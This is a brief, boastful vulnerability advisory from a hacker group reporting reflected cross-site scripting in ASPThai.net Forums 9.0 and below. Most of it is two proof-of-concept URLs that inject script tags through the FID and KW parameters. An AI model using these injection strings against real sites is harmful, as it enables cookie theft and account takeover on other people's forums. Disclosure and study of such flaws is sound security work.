ASPThai Forums version 9.0 and below suffer cross site scripting flaws.
eff15390edafcdcbb7b2f68952bacd9a16b110eed8447ce4b4072f35617a1fbe
I MurderSkillz from g00ns.net have found xss vulnerabilities in ASPThai.net Forums <= 9.0 .
Shouts to z3r0, neX, uid0 (exploitercode.com), Zodiac, Wicked, and all the other I may have forgot..
Once again..g00ns.net fucking owns j00!
the xss takes place in
----------
/forum/registration_rules.asp
?FID="><script>alert('document.cookie');</script>
-----------
/forum/search_form.asp
?FID=0&KW="><script>alert('document.cookie');</script>&SI=AR&FM=1&TID=934&PN=0&TPN=1